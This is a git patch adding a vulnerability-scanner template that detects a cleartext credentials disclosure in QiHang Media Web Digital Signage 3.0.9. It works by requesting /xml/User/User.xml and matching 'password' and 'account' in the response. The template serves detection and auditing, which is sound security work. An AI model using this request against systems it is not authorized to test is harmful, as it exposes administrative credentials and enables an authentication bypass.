From f750bf5ba5e44d1fdd240f5d28adf7b10b6c48df Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Fri, 1 Oct 2021 15:42:48 +0900 Subject: [PATCH] Create qihang-media-web-credentials-disclosure.yaml The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. Signed-off-by: GwanYeong Kim --- ...hang-media-web-credentials-disclosure.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml diff --git a/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml b/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml new file mode 100644 index 0000000000..018107e323 --- /dev/null +++ b/vulnerabilities/other/qihang-media-web-credentials-disclosure.yaml @@ -0,0 +1,22 @@ +id: qihang-media-web-credentials-disclosure + +info: + name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 - Cleartext Credentials Disclosure + author: gy741 + severity: critical + description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php + tags: qihang,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/xml/User/User.xml" + + matchers: + - type: word + words: + - "User id" + - "account" + - "password" + condition: and